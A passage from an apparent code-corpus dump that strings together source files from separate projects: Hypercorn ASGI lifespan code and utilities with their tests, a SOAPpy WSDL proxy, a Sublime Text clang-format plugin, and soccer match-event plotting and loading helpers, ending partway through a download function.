class UnexpectedMessage(Exception):
pass
class Lifespan:
def __init__(self, app: Type[ASGIFramework], config: Config) -> None:
self.app = app
self.config = config
self.startup = trio.Event()
self.shutdown = trio.Event()
self.app_send_channel, self.app_receive_channel = trio.open_memory_channel(10)
self.supported = True
async def handle_lifespan(
self, *, task_status: trio._core._run._TaskStatus = trio.TASK_STATUS_IGNORED
) -> None:
task_status.started()
scope = {"type": "lifespan"}
try:
asgi_instance = self.app(scope)
except Exception:
self.supported = False
if self.config.error_logger is not None:
self.config.error_logger.warning(
"ASGI Framework Lifespan error, continuing without Lifespan support"
)
else:
try:
await asgi_instance(self.asgi_receive, self.asgi_send)
except Exception:
if self.config.error_logger is not None:
self.config.error_logger.exception("Error in ASGI Framework")
finally:
await self.app_send_channel.aclose()
await self.app_receive_channel.aclose()
async def wait_for_startup(self) -> None:
if not self.supported:
return
await self.app_send_channel.send({"type": "lifespan.startup"})
with trio.fail_after(self.config.startup_timeout):
await self.startup.wait()
async def wait_for_shutdown(self) -> None:
if not self.supported:
return
await self.app_send_channel.send({"type": "lifespan.shutdown"})
with trio.fail_after(self.config.shutdown_timeout):
await self.shutdown.wait()
async def asgi_receive(self) -> dict:
return await self.app_receive_channel.receive()
async def asgi_send(self, message: dict) -> None:
if message["type"] == "lifespan.startup.complete":
self.startup.set()
elif message["type"] == "lifespan.shutdown.complete":
self.shutdown.set()
else:
raise UnexpectedMessage(message["type"])
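# Rough usage sketch (assumes a Config instance and an ASGI app class are available;
# it mirrors how a server would start the lifespan task before serving requests):
#
#   async def serve(app, config):
#       lifespan = Lifespan(app, config)
#       async with trio.open_nursery() as nursery:
#           await nursery.start(lifespan.handle_lifespan)
#           await lifespan.wait_for_startup()
#           ...  # run the protocol servers here
#           await lifespan.wait_for_shutdown()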
```
#### File: hypercorn/hypercorn/utils.py
```python
import os
import platform
import socket
import sys
from importlib import import_module
from multiprocessing.synchronize import Event as EventType
from pathlib import Path
from time import time
from types import ModuleType
from typing import Any, Awaitable, Callable, Dict, List, Optional, Tuple, Type
from wsgiref.handlers import format_date_time
from .typing import ASGIFramework
class Shutdown(Exception):
pass
class MustReloadException(Exception):
pass
class NoAppException(Exception):
pass
def suppress_body(method: str, status_code: int) -> bool:
return method == "HEAD" or 100 <= status_code < 200 or status_code in {204, 304, 412}
def response_headers(protocol: str) -> List[Tuple[bytes, bytes]]:
return [
(b"date", format_date_time(time()).encode("ascii")),
(b"server", f"hypercorn-{protocol}".encode("ascii")),
]
def load_application(path: str) -> Type[ASGIFramework]:
try:
module_name, app_name = path.split(":", 1)
except ValueError:
module_name, app_name = path, "app"
except AttributeError:
raise NoAppException()
module_path = Path(module_name).resolve()
sys.path.insert(0, str(module_path.parent))
if module_path.is_file():
import_name = module_path.with_suffix("").name
else:
import_name = module_path.name
try:
module = import_module(import_name)
except ModuleNotFoundError as error:
if error.name == import_name: # type: ignore
raise NoAppException()
else:
raise
try:
return eval(app_name, vars(module))
except NameError:
raise NoAppException()
async def observe_changes(sleep: Callable[[float], Awaitable[Any]]) -> None:
last_updates: Dict[ModuleType, float] = {}
while True:
for module in list(sys.modules.values()):
filename = getattr(module, "__file__", None)
if filename is None:
continue
try:
mtime = Path(filename).stat().st_mtime
except FileNotFoundError:
continue
else:
if mtime > last_updates.get(module, mtime):
raise MustReloadException()
last_updates[module] = mtime
await sleep(1)
def restart() -> None:
# Restart this process (only safe for dev/debug)
executable = sys.executable
script_path = Path(sys.argv[0]).resolve()
args = sys.argv[1:]
main_package = sys.modules["__main__"].__package__
if main_package is None:
# Executed by filename
if platform.system() == "Windows":
if not script_path.exists() and script_path.with_suffix(".exe").exists():
# quart run
executable = str(script_path.with_suffix(".exe"))
else:
# python run.py
args.append(str(script_path))
else:
if script_path.is_file() and os.access(script_path, os.X_OK):
# hypercorn run:app --reload
executable = str(script_path)
else:
# python run.py
args.append(str(script_path))
else:
# Executed as a module e.g. python -m run
module = script_path.stem
import_name = main_package
if module != "__main__":
import_name = f"{main_package}.{module}"
args[:0] = ["-m", import_name.lstrip(".")]
os.execv(executable, [executable] + args)
async def check_shutdown(
shutdown_event: EventType, sleep: Callable[[float], Awaitable[Any]]
) -> None:
while True:
if shutdown_event.is_set():
raise Shutdown()
await sleep(0.1)
def write_pid_file(pid_path: str) -> None:
with open(pid_path, "w") as file_:
file_.write(f"{os.getpid()}")
def parse_socket_addr(family: int, address: tuple) -> Optional[Tuple[str, int]]:
if family == socket.AF_INET:
return address # type: ignore
elif family == socket.AF_INET6:
return (address[0], address[1])
else:
return None
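# Illustrative note on the "module:attribute" syntax accepted by load_application();
# the names below are placeholders:
#   load_application("example:app")   # imports example(.py) and evaluates "app" in it
#   load_application("example")       # same, defaulting the attribute name to "app"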
```
#### File: tests/asyncio/helpers.py
```python
import asyncio
from socket import AF_INET
from typing import Tuple
class MockSocket:
family = AF_INET
def getsockname(self) -> Tuple[str, int]:
return ("172.16.17.32", 80)
def getpeername(self) -> Tuple[str, int]:
return ("127.0.0.1", 80)
class MockTransport:
def __init__(self) -> None:
self.data = bytearray()
self.closed = asyncio.Event()
self.updated = asyncio.Event()
def get_extra_info(self, name: str) -> MockSocket:
if name == "socket":
return MockSocket()
return None
def write(self, data: bytes) -> None:
assert not self.closed.is_set()
if data == b"":
return
self.data.extend(data)
self.updated.set()
def close(self) -> None:
self.updated.set()
self.closed.set()
def clear(self) -> None:
self.data = bytearray()
self.updated.clear()
```
#### File: hypercorn/tests/test_logging.py
```python
import logging
import os
import time
from typing import Optional, Type, Union
import pytest
from hypercorn.logging import AccessLogAtoms, AccessLogger
@pytest.mark.parametrize(
"target, expected_name, expected_handler_type",
[
("-", "hypercorn.access", logging.StreamHandler),
("/tmp/path", "hypercorn.access", logging.FileHandler),
(logging.getLogger("test_special"), "test_special", None),
(None, None, None),
],
)
def test_access_logger_init(
target: Union[logging.Logger, str, None],
expected_name: Optional[str],
expected_handler_type: Optional[Type[logging.Handler]],
) -> None:
access_logger = AccessLogger("%h", target)
assert access_logger.log_format == "%h"
if expected_name is None:
assert access_logger.logger is None
else:
assert access_logger.logger.name == expected_name
if expected_handler_type is None:
assert access_logger.handlers == []
else:
assert isinstance(access_logger.handlers[0], expected_handler_type)
@pytest.fixture(name="request_scope")
def _request_scope() -> dict:
return {
"type": "http",
"http_version": "2",
"method": "GET",
"scheme": "https",
"path": "/",
"query_string": b"a=b",
"root_path": "",
"headers": [
(b"User-Agent", b"Hypercorn"),
(b"X-Hypercorn", b"Hypercorn"),
(b"Referer", b"hypercorn"),
],
"client": ("127.0.0.1",),
"server": None,
}
@pytest.fixture(name="response")
def _response_scope() -> dict:
return {"status": 200, "headers": [(b"Content-Length", b"5"), (b"X-Hypercorn", b"Hypercorn")]}
def test_access_log_standard_atoms(request_scope: dict, response: dict) -> None:
atoms = AccessLogAtoms(request_scope, response, 0.000_023)
assert atoms["h"] == "127.0.0.1"
assert atoms["l"] == "-"
assert time.strptime(atoms["t"], "[%d/%b/%Y:%H:%M:%S %z]")
assert int(atoms["s"]) == 200
assert atoms["m"] == "GET"
assert atoms["U"] == "/"
assert atoms["q"] == "a=b"
assert atoms["H"] == "2"
assert int(atoms["b"]) == 5
assert int(atoms["B"]) == 5
assert atoms["f"] == "hypercorn"
assert atoms["a"] == "Hypercorn"
assert atoms["p"] == f"<{os.getpid()}>"
assert atoms["not-atom"] == "-"
assert atoms["T"] == 0
assert atoms["D"] == 23
assert atoms["L"] == "0.000023"
def test_access_log_header_atoms(request_scope: dict, response: dict) -> None:
atoms = AccessLogAtoms(request_scope, response, 0)
assert atoms["{X-Hypercorn}i"] == "Hypercorn"
assert atoms["{X-HYPERCORN}i"] == "Hypercorn"
assert atoms["{not-atom}i"] == "-"
assert atoms["{X-Hypercorn}o"] == "Hypercorn"
assert atoms["{X-HYPERCORN}o"] == "Hypercorn"
def test_access_log_environ_atoms(request_scope: dict, response: dict) -> None:
os.environ["Random"] = "Environ"
atoms = AccessLogAtoms(request_scope, response, 0)
assert atoms["{random}e"] == "Environ"
``` |
{
"source": "jonozzz/SOAPpy",
"score": 3
} |
#### File: src/SOAPpy/WSDL.py
```python
ident = '$Id: WSDL.py 1467 2008-05-16 23:32:51Z warnes $'
from version import __version__
import wstools
import xml
from Errors import Error
from Client import SOAPProxy, SOAPAddress
from Config import Config
import urllib
class Proxy:
"""WSDL Proxy.
SOAPProxy wrapper that parses method names, namespaces, soap actions from
the web service description language (WSDL) file passed into the
constructor. The WSDL reference can be passed in as a stream, an url, a
file name, or a string.
Loads info into self.methods, a dictionary with methodname keys and values
of WSDLTools.SOAPCallinfo.
For example,
url = 'http://www.xmethods.org/sd/2001/TemperatureService.wsdl'
wsdl = WSDL.Proxy(url)
print len(wsdl.methods) # 1
print wsdl.methods.keys() # getTemp
See WSDLTools.SOAPCallinfo for more info on each method's attributes.
"""
def __init__(self, wsdlsource, config=Config, **kw ):
reader = wstools.WSDLTools.WSDLReader()
self.wsdl = None
# From <NAME>'s "Dive Into Python" toolkit.py--open anything.
if self.wsdl is None and hasattr(wsdlsource, "read"):
print 'stream:', wsdlsource
try:
self.wsdl = reader.loadFromStream(wsdlsource)
except xml.parsers.expat.ExpatError, e:
newstream = urllib.URLopener(key_file=config.SSL.key_file, cert_file=config.SSL.cert_file).open(wsdlsource)
buf = newstream.readlines()
raise Error, "Unable to parse WSDL file at %s: \n\t%s" % \
(wsdlsource, "\t".join(buf))
# NOT TESTED (as of April 17, 2003)
#if self.wsdl is None and wsdlsource == '-':
# import sys
# self.wsdl = reader.loadFromStream(sys.stdin)
# print 'stdin'
if self.wsdl is None:
try:
file(wsdlsource)
self.wsdl = reader.loadFromFile(wsdlsource)
#print 'file'
except (IOError, OSError): pass
except xml.parsers.expat.ExpatError, e:
newstream = urllib.urlopen(wsdlsource)
buf = newstream.readlines()
raise Error, "Unable to parse WSDL file at %s: \n\t%s" % \
(wsdlsource, "\t".join(buf))
if self.wsdl is None:
try:
stream = urllib.URLopener(key_file=config.SSL.key_file, cert_file=config.SSL.cert_file).open(wsdlsource)
self.wsdl = reader.loadFromStream(stream, wsdlsource)
except (IOError, OSError): pass
except xml.parsers.expat.ExpatError, e:
newstream = urllib.urlopen(wsdlsource)
buf = newstream.readlines()
raise Error, "Unable to parse WSDL file at %s: \n\t%s" % \
(wsdlsource, "\t".join(buf))
if self.wsdl is None:
import StringIO
self.wsdl = reader.loadFromString(str(wsdlsource))
#print 'string'
# Package wsdl info as a dictionary of remote methods, with method name
# as key (based on ServiceProxy.__init__ in ZSI library).
self.methods = {}
service = self.wsdl.services[0]
port = service.ports[0]
name = service.name
binding = port.getBinding()
portType = binding.getPortType()
for operation in portType.operations:
callinfo = wstools.WSDLTools.callInfoFromWSDL(port, operation.name)
self.methods[callinfo.methodName] = callinfo
self.soapproxy = SOAPProxy('http://localhost/dummy.webservice',
config=config, **kw)
def __str__(self):
s = ''
for method in self.methods.values():
s += str(method)
return s
def __getattr__(self, name):
"""Set up environment then let parent class handle call.
Raises AttributeError is method name is not found."""
if not self.methods.has_key(name): raise AttributeError, name
callinfo = self.methods[name]
self.soapproxy.proxy = SOAPAddress(callinfo.location)
self.soapproxy.namespace = callinfo.namespace
self.soapproxy.soapaction = callinfo.soapAction
return self.soapproxy.__getattr__(name)
def show_methods(self):
for key in self.methods.keys():
method = self.methods[key]
print "Method Name:", key.ljust(15)
print
inps = method.inparams
for parm in range(len(inps)):
details = inps[parm]
print " In #%d: %s (%s)" % (parm, details.name, details.type)
print
outps = method.outparams
for parm in range(len(outps)):
details = outps[parm]
print " Out #%d: %s (%s)" % (parm, details.name, details.type)
print
``` |
{
"source": "jonpalmisc/st-clang-format",
"score": 3
} |
#### File: jonpalmisc/st-clang-format/ClangFormat.py
```python
import sublime
import sublime_plugin
import subprocess
class ClangFormatCommand(sublime_plugin.TextCommand):
"""Format the current buffer."""
def run(self, edit: sublime.Edit, style: str):
command = ["clang-format", "-style", style, "-"]
process = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
)
global_region = sublime.Region(0, self.view.size())
buffer = self.view.substr(global_region)
result, error = process.communicate(buffer.encode("utf-8"))
if error:
sublime.error_message("Failed to format buffer.")
return
self.view.replace(edit, global_region, result.decode("utf-8"))
def input(self, _):
return StyleInputHandler()
class StyleInputHandler(sublime_plugin.ListInputHandler):
"""Input handler to choose format presets."""
def list_items(self):
return ["Default", "LLVM", "WebKit"]
``` |
{
"source": "jonpappalord/soccer_logs_exploration",
"score": 3
} |
#### File: jonpappalord/soccer_logs_exploration/plot_utils.py
```python
import matplotlib.pyplot as plt
from matplotlib.patches import Ellipse
from matplotlib.ticker import FormatStrFormatter
import pandas as pd
import seaborn as sns
from collections import Counter
import numpy as np
from plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot
import plotly.graph_objs as go
data_folder = 'data/'
tags_names_df = pd.read_csv(data_folder + 'tags2name.csv')
def pitch():
"""
code to plot a soccer pitch
"""
#create figure
fig,ax=plt.subplots(figsize=(7,5))
#Pitch Outline & Centre Line
plt.plot([0,0],[0,100], color="black")
plt.plot([0,100],[100,100], color="black")
plt.plot([100,100],[100,0], color="black")
plt.plot([100,0],[0,0], color="black")
plt.plot([50,50],[0,100], color="black")
#Left Penalty Area
plt.plot([16.5,16.5],[80,20],color="black")
plt.plot([0,16.5],[80,80],color="black")
plt.plot([16.5,0],[20,20],color="black")
#Right Penalty Area
plt.plot([83.5,100],[80,80],color="black")
plt.plot([83.5,83.5],[80,20],color="black")
plt.plot([83.5,100],[20,20],color="black")
#Left 6-yard Box
plt.plot([0,5.5],[65,65],color="black")
plt.plot([5.5,5.5],[65,35],color="black")
plt.plot([5.5,0.5],[35,35],color="black")
#Right 6-yard Box
plt.plot([100,94.5],[65,65],color="black")
plt.plot([94.5,94.5],[65,35],color="black")
plt.plot([94.5,100],[35,35],color="black")
#Prepare Circles
centreCircle = Ellipse((50, 50), width=30, height=39, edgecolor="black", facecolor="None", lw=1.8)
centreSpot = Ellipse((50, 50), width=1, height=1.5, edgecolor="black", facecolor="black", lw=1.8)
leftPenSpot = Ellipse((11, 50), width=1, height=1.5, edgecolor="black", facecolor="black", lw=1.8)
rightPenSpot = Ellipse((89, 50), width=1, height=1.5, edgecolor="black", facecolor="black", lw=1.8)
#Draw Circles
ax.add_patch(centreCircle)
ax.add_patch(centreSpot)
ax.add_patch(leftPenSpot)
ax.add_patch(rightPenSpot)
#limit axis
plt.xlim(0,100)
plt.ylim(0,100)
ax.annotate("", xy=(25, 5), xytext=(5, 5),
arrowprops=dict(arrowstyle="->", linewidth=2))
ax.text(7,7,'Attack',fontsize=20)
return fig,ax
def draw_pitch(pitch, line, orientation, view, alpha=1):
"""
    Draw a soccer pitch given its fill colour, line colour, orientation and view.
    Parameters
    ----------
    pitch : str
        fill colour of the pitch surface (e.g. '#195905')
    line : str
        colour of the pitch markings
    orientation : str
        'horizontal' or 'vertical'
    view : str
        'full' for the whole pitch, 'half' for the attacking half only
    alpha : float, optional
        transparency of the pitch fill. Default: 1
"""
orientation = orientation
view = view
line = line
pitch = pitch
if orientation.lower().startswith("h"):
if view.lower().startswith("h"):
fig,ax = plt.subplots(figsize=(6.8,10.4))
plt.xlim(49,105)
plt.ylim(-1,69)
else:
fig,ax = plt.subplots(figsize=(10.4,6.8))
plt.xlim(-1,105)
plt.ylim(-1,69)
ax.axis('off') # this hides the x and y ticks
# side and goal lines #
ly1 = [0,0,68,68,0]
lx1 = [0,104,104,0,0]
plt.plot(lx1,ly1,color=line,zorder=5)
# boxes, 6 yard box and goals
#outer boxes#
ly2 = [13.84,13.84,54.16,54.16]
lx2 = [104,87.5,87.5,104]
plt.plot(lx2,ly2,color=line,zorder=5)
ly3 = [13.84,13.84,54.16,54.16]
lx3 = [0,16.5,16.5,0]
plt.plot(lx3,ly3,color=line,zorder=5)
#goals#
ly4 = [30.34,30.34,37.66,37.66]
lx4 = [104,104.2,104.2,104]
plt.plot(lx4,ly4,color=line,zorder=5)
ly5 = [30.34,30.34,37.66,37.66]
lx5 = [0,-0.2,-0.2,0]
plt.plot(lx5,ly5,color=line,zorder=5)
#6 yard boxes#
ly6 = [24.84,24.84,43.16,43.16]
lx6 = [104,99.5,99.5,104]
plt.plot(lx6,ly6,color=line,zorder=5)
ly7 = [24.84,24.84,43.16,43.16]
lx7 = [0,4.5,4.5,0]
plt.plot(lx7,ly7,color=line,zorder=5)
#Halfway line, penalty spots, and kickoff spot
ly8 = [0,68]
lx8 = [52,52]
plt.plot(lx8,ly8,color=line,zorder=5)
plt.scatter(93,34,color=line,zorder=5)
plt.scatter(11,34,color=line,zorder=5)
plt.scatter(52,34,color=line,zorder=5)
circle1 = plt.Circle((93.5,34), 9.15,ls='solid',lw=1.5,color=line, fill=False, zorder=1,alpha=1)
circle2 = plt.Circle((10.5,34), 9.15,ls='solid',lw=1.5,color=line, fill=False, zorder=1,alpha=1)
circle3 = plt.Circle((52, 34), 9.15,ls='solid',lw=1.5,color=line, fill=False, zorder=2,alpha=1)
## Rectangles in boxes
rec1 = plt.Rectangle((87.5,20), 16,30,ls='-',color=pitch, zorder=1,alpha=alpha)
rec2 = plt.Rectangle((0, 20), 16.5,30,ls='-',color=pitch, zorder=1,alpha=alpha)
## Pitch rectangle
rec3 = plt.Rectangle((-1, -1), 106,70,ls='-',color=pitch, zorder=1,alpha=alpha)
ax.add_artist(rec3)
ax.add_artist(circle1)
ax.add_artist(circle2)
ax.add_artist(rec1)
ax.add_artist(rec2)
ax.add_artist(circle3)
else:
if view.lower().startswith("h"):
fig,ax = plt.subplots(figsize=(10.4,6.8))
plt.ylim(49,105)
plt.xlim(-1,69)
else:
fig,ax = plt.subplots(figsize=(6.8,10.4))
plt.ylim(-1,105)
plt.xlim(-1,69)
ax.axis('off') # this hides the x and y ticks
# side and goal lines #
lx1 = [0,0,68,68,0]
ly1 = [0,104,104,0,0]
plt.plot(lx1,ly1,color=line,zorder=5)
# boxes, 6 yard box and goals
#outer boxes#
lx2 = [13.84,13.84,54.16,54.16]
ly2 = [104,87.5,87.5,104]
plt.plot(lx2,ly2,color=line,zorder=5)
lx3 = [13.84,13.84,54.16,54.16]
ly3 = [0,16.5,16.5,0]
plt.plot(lx3,ly3,color=line,zorder=5)
#goals#
lx4 = [30.34,30.34,37.66,37.66]
ly4 = [104,104.2,104.2,104]
plt.plot(lx4,ly4,color=line,zorder=5)
lx5 = [30.34,30.34,37.66,37.66]
ly5 = [0,-0.2,-0.2,0]
plt.plot(lx5,ly5,color=line,zorder=5)
#6 yard boxes#
lx6 = [24.84,24.84,43.16,43.16]
ly6 = [104,99.5,99.5,104]
plt.plot(lx6,ly6,color=line,zorder=5)
lx7 = [24.84,24.84,43.16,43.16]
ly7 = [0,4.5,4.5,0]
plt.plot(lx7,ly7,color=line,zorder=5)
#Halfway line, penalty spots, and kickoff spot
lx8 = [0,68]
ly8 = [52,52]
plt.plot(lx8,ly8,color=line,zorder=5)
plt.scatter(34,93,color=line,zorder=5)
plt.scatter(34,11,color=line,zorder=5)
plt.scatter(34,52,color=line,zorder=5)
circle1 = plt.Circle((34,93.5), 9.15,ls='solid',lw=1.5,color=line, fill=False, zorder=1,alpha=1)
circle2 = plt.Circle((34,10.5), 9.15,ls='solid',lw=1.5,color=line, fill=False, zorder=1,alpha=1)
circle3 = plt.Circle((34,52), 9.15,ls='solid',lw=1.5,color=line, fill=False, zorder=2,alpha=1)
## Rectangles in boxes
rec1 = plt.Rectangle((20, 87.5), 30,16.5,ls='-',color=pitch, zorder=1,alpha=alpha)
rec2 = plt.Rectangle((20, 0), 30,16.5,ls='-',color=pitch, zorder=1,alpha=alpha)
## Pitch rectangle
rec3 = plt.Rectangle((-1, -1), 70,106,ls='-',color=pitch, zorder=1,alpha=alpha)
ax.add_artist(rec3)
ax.add_artist(circle1)
ax.add_artist(circle2)
ax.add_artist(rec1)
ax.add_artist(rec2)
ax.add_artist(circle3)
def get_pitch_layout(title):
lines_color = 'black'
bg_color = 'rgb(255, 255, 255)'
pitch_layout = dict(hovermode='closest', autosize=False,
width=825,
height=600,
plot_bgcolor=bg_color,#'rgb(59,205,55)',
xaxis={
'range': [0, 100],
'showgrid': False,
'showticklabels': False,
},
yaxis={
'range': [0, 100],
'showgrid': False,
'showticklabels': False,
},
title=title,
shapes=[
{
'type': 'circle',
'xref': 'x',
'yref': 'y',
'y0': 35,
'x0': 40,
'y1': 65,
'x1': 60,
'line': {
'color': lines_color,
},
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 35,
'x0': 0,
'y1': 35,
'x1': 10,
'line': {
'color': lines_color,
},
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 35,
'x0': 10,
'y1': 65,
'x1': 10,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 65,
'x0': 10,
'y1': 65,
'x1': 0,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 35,
'x0': 100,
'y1': 35,
'x1': 90,
'line': {
'color': lines_color,
},
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 35,
'x0': 90,
'y1': 65,
'x1': 90,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 65,
'x0': 90,
'y1': 65,
'x1': 100,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 100,
'x0': 50,
'y1': 0,
'x1': 50,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 0,
'x0': 0,
'y1': 100,
'x1': 0,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 0,
'x0': 100,
'y1': 100,
'x1': 100,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 100,
'x0': 0,
'y1': 100,
'x1': 100,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 0,
'x0': 0,
'y1': 0,
'x1': 100,
'line': {
'color': lines_color,
}
},
]
)
return pitch_layout
def plot_invasion_and_acceleration_index(match_label, list_invasion, list_acceleration):
sns.set_style('ticks')
fig, ax = plt.subplots(2,1, figsize=(10,10), sharex=True)
print ('INVASION INDEX')
for i, c, label in zip(list(list_invasion),
['darkred','k'], ['AS Roma','ACF Fiorentina']):
df_invasion = pd.DataFrame(list_invasion[i], columns=['time','invasion'])
df_invasion['time'] = [x/60. for x in df_invasion.time]
print(label, round(df_invasion['invasion'].mean(), 2),
round(df_invasion['invasion'].std(), 2))
ax[0].plot(df_invasion.set_index('time').rolling(220, min_periods=1).mean(),c=c,alpha=0.7,lw=4,label=label)
ax[0].legend(loc=1,fontsize=18,frameon=True,shadow=True)
ax[0].grid(alpha=0.1)
ax[0].set_ylabel('invasion index',fontsize=25)
ax[0].yaxis.set_tick_params(labelsize=18)
ax[0].text(45.8,0.45,'half time',rotation=90,bbox=dict(facecolor='w',edgecolor='r',lw=2),
verticalalignment='center',horizontalalignment='left',fontsize=15,color='r')
ax[0].vlines(47,-1,2,colors='r',lw=2)
ax[0].text(6,0.45,'goal',rotation=90,bbox=dict(facecolor='w',edgecolor='rebeccapurple',lw=2),
verticalalignment='center',horizontalalignment='left',fontsize=15,color='rebeccapurple')
ax[0].vlines(7,-1,2,colors='rebeccapurple',lw=2)
ax[0].text(38,0.45,'goal',rotation=90,bbox=dict(facecolor='w',edgecolor='rebeccapurple',lw=2),
verticalalignment='center',horizontalalignment='left',fontsize=15,color='rebeccapurple')
ax[0].vlines(39,-1,2,colors='rebeccapurple',lw=2)
ax[0].text(85,0.08,'(a)',fontsize=25)
ax[0].set_ylim(0,0.55)
ax[0].set_title(match_label,fontsize=35)
print ('\nACCELERATION INDEX')
for i,c,label in zip(list(list_acceleration),
['darkred','k'],
['AS Roma','ACF Fiorentina']):
df_acceleration = pd.DataFrame(list_acceleration[i],columns=['time','acceleration'])
df_acceleration['time'] = [x/60. for x in df_acceleration.time]
print (label, round(df_acceleration['acceleration'].mean(), 2),
round(df_acceleration['acceleration'].std(), 2))
ax[1].plot(df_acceleration.set_index('time').rolling(220, min_periods=1).mean(),c=c,alpha=0.7,lw=4,label=label)
ax[1].legend(fontsize=18,frameon=True,shadow=True,loc=1)
ax[1].grid(alpha=0.1)
ax[1].set_ylabel('acceleration index', fontsize=25)
ax[1].xaxis.set_tick_params(labelsize=18)
ax[1].yaxis.set_tick_params(labelsize=18)
ax[1].text(85, 0.02,'(b)', fontsize=25)
ax[1].vlines(47, -1, 2, colors='r', lw=2)
plt.xlabel('time (min)', fontsize=25)
ax[1].yaxis.set_major_formatter(FormatStrFormatter('%.2f'))
plt.xlim(0,95)
ax[1].vlines(7,-1,2,colors='rebeccapurple',lw=2)
ax[1].vlines(39,-1,2,colors='rebeccapurple',lw=2)
plt.ylim(0,0.15)
fig.tight_layout()
plt.show()
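# Minimal usage sketch for the drawing helpers above; the colours and the
# orientation/view strings are just examples.
if __name__ == "__main__":
    fig, ax = pitch()                                         # schematic 0-100 pitch
    draw_pitch("#195905", "#faf0e6", "horizontal", "full")    # metric 104x68 pitch
    plt.show()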
```
#### File: jonpappalord/soccer_logs_exploration/utils.py
```python
import json
from tqdm import tqdm
from collections import Counter
import numpy as np
import operator
from matplotlib.ticker import FuncFormatter
import seaborn as sns
import pandas as pd
import networkx as nx
import base64
from collections import defaultdict
import sys,os
import math
import random
import operator
import csv
import matplotlib.pylab as pyl
import itertools
import scipy as sp
from scipy import stats
from scipy import optimize
from scipy.integrate import quad
import matplotlib.pyplot as plt
ACCURATE_PASS = 1801
EVENT_TYPES = ['Duel', 'Foul', 'Free Kick', 'Interruption',
'Offside', 'Others on the ball', 'Pass', 'Shot']
TOURNAMENTS = ['Italy', 'England', 'Germany', 'France',
               'Spain', 'European_Championship', 'World_Cup']
data_folder = 'data/'
def load_public_dataset(data_folder=data_folder, tournament='Italy'):
"""
Load the json files with the matches, events, players and competitions
Parameters
----------
data_folder : str, optional
the path to the folder where json files are stored. Default: 'data/'
tournaments : list, optional
the list of tournaments to load.
Returns
-------
tuple
a tuple of four dictionaries, containing matches, events, players and competitions
"""
# loading the matches and events data
matches, events = {}, {}
with open('./data/events/events_%s.json' %tournament) as json_data:
events = json.load(json_data)
with open('./data/matches/matches_%s.json' %tournament) as json_data:
matches = json.load(json_data)
match_id2events = defaultdict(list)
match_id2match = defaultdict(dict)
for event in events:
match_id = event['matchId']
match_id2events[match_id].append(event)
for match in matches:
match_id = match['wyId']
match_id2match[match_id] = match
# loading the players data
with open('./data/players.json') as json_data:
players = json.load(json_data)
player_id2player = defaultdict(dict)
for player in players:
player_id = player['wyId']
player_id2player[player_id] = player
# loading the competitions data
competitions={}
with open('./data/competitions.json') as json_data:
competitions = json.load(json_data)
competition_id2competition = defaultdict(dict)
for competition in competitions:
competition_id = competition['wyId']
competition_id2competition[competition_id] = competition
# loading the competitions data
teams={}
with open('./data/teams.json') as json_data:
teams = json.load(json_data)
team_id2team = defaultdict(dict)
for team in teams:
team_id = team['wyId']
team_id2team[team_id] = team
return match_id2match, match_id2events, player_id2player, competition_id2competition, team_id2team
def get_weight(position):
"""
Get the probability of scoring a goal given the position of the field where
the event is generated.
Parameters
----------
position: tuple
the x,y coordinates of the event
"""
x, y = position
# 0.01
if x >= 65 and x <= 75:
return 0.01
# 0.5
if (x > 75 and x <= 85) and (y >= 15 and y <= 85):
return 0.5
    if x > 85 and ((y >= 15 and y <= 25) or (y >= 75 and y <= 85)):
return 0.5
# 0.02
if x > 75 and (y <= 15 or y >= 85):
return 0.02
# 1.0
if x > 85 and (y >= 40 and y <= 60):
return 1.0
# 0.8
if x > 85 and (y >= 25 and y <= 40 or y >= 60 and y <= 85):
return 0.8
return 0.0
def in_window(events_match, time_window):
    start, end = events_match[0], events_match[-1]
return start['eventSec'] >= time_window[0] and end['eventSec'] <= time_window[1]
def segno(x):
"""
Input: x, a number
Return: 1.0 if x>0,
-1.0 if x<0,
0.0 if x==0
"""
if x > 0.0: return 1.0
elif x < 0.0: return -1.0
elif x == 0.0: return 0.0
def standard_dev(list):
ll = len(list)
m = 1.0 * sum(list)/ll
return ( sum([(elem-m)**2.0 for elem in list]) / ll )**0.5
def list_check(lista):
"""
If a list has only one element, return that element. Otherwise return the whole list.
"""
try:
e2 = lista[1]
return lista
except IndexError:
return lista[0]
def get_event_name(event):
event_name = ''
try:
if event['subEventName'] != '':
event_name = event_names_df[(event_names_df.event == event['eventName']) & (event_names_df.subevent == event['subEventName'])].subevent_label.values[0]
else:
event_name = event_names_df[event_names_df.event == event['eventName']].event_label.values[0]
except TypeError:
#print event
pass
return event_name
def is_in_match(player_id, match):
team_ids = list(match['teamsData'].keys())
all_players = []
for team in team_ids:
in_bench_players = [m['playerId'] for m in match['teamsData'][team]['formation']['bench']]
in_lineup_players = [m['playerId'] for m in match['teamsData'][team]['formation']['lineup']]
substituting_players = [m['playerIn'] for m in match['teamsData'][team]['formation']['substitutions']]
all_players += in_bench_players + in_lineup_players + substituting_players
return player_id in all_players
def data_download():
"""
Downloading script for soccer logs public open dataset:
https://figshare.com/collections/Soccer_match_event_dataset/4415000/2
Data description available here:
Please cite the source as:
<NAME>., <NAME>., <NAME>. et al. A public data set of spatio-temporal match events in soccer competitions.
Scientific Data 6, 236 (2019) doi:10.1038/s41597-019-0247-7, https://www.nature.com/articles/s41597-019-0247-7
"""
import requests, zipfile, json, io
dataset_links = {
'matches' : 'https://ndownloader.figshare.com/files/14464622',
'events' : 'https://ndownloader.figshare.com/files/14464685',
